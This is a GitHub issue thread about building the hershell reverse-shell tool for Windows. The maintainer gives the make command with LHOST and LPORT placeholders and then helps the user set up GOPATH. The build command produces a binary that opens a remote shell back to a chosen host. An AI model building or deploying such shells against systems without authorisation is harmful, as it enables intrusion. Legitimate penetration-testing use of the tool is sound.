### ISSUE TITLE
how to generate exe file?

### ISSUE THREAD

**Issue by gearcapitan** [sysdream/hershell#4]
![kali linux-2018-02-05-15-42-39](https://user-images.githubusercontent.com/13740942/35830260-34e57eec-0a8b-11e8-9c6f-fa5caffb43d0.png)

i cant see, exe files

**Comment by lesnuages** [comment]
Hi @gearcapitan,

There are helper targets in the makefile to do just what you're trying to do (see [README](https://github.com/sysdream/hershell/blob/master/README.md) ).

Just use `make depends && make windows64 LHOST=YOUR_IP LPORT=YOUR_PORT` and you should be good to go (if you want to build a binary for a x64 Windows of course).

**Comment by lesnuages** [comment]
Oh, and by the way, you might want to pull the latest version. There was a broken reference to my personnal clone of the project.

**Comment by gearcapitan** [comment]
ok, thank you I verify it and I will notify you

**Comment by gearcapitan** [comment]
![kali linux-2018-02-06-14-02-47](https://user-images.githubusercontent.com/13740942/35881455-70a415ae-0b46-11e8-9c89-604abfda6df3.png)
ammm?...



Makefile:29: fallo en las instrucciones para el objetivo 'windows64'
make: *** [windows64] Error 1

**Comment by lesnuages** [comment]
Did you setup your `$GOPATH` environment variable ?
How did you get the project ?

The easiest way to get it working is to:

- set your $GOPATH environment (see the [official documentation](https://golang.org/doc/install))
- run `go get github.com/sysdream/hershell`

Then in the `$GOPATH/src/github.com/sysdream/hershell`, you can run your `make` command.

As it is a Go project, I thought this was obvious, but I'll add some clarification to the README.

**Comment by lesnuages** [comment]
No response, I'm closing this one.
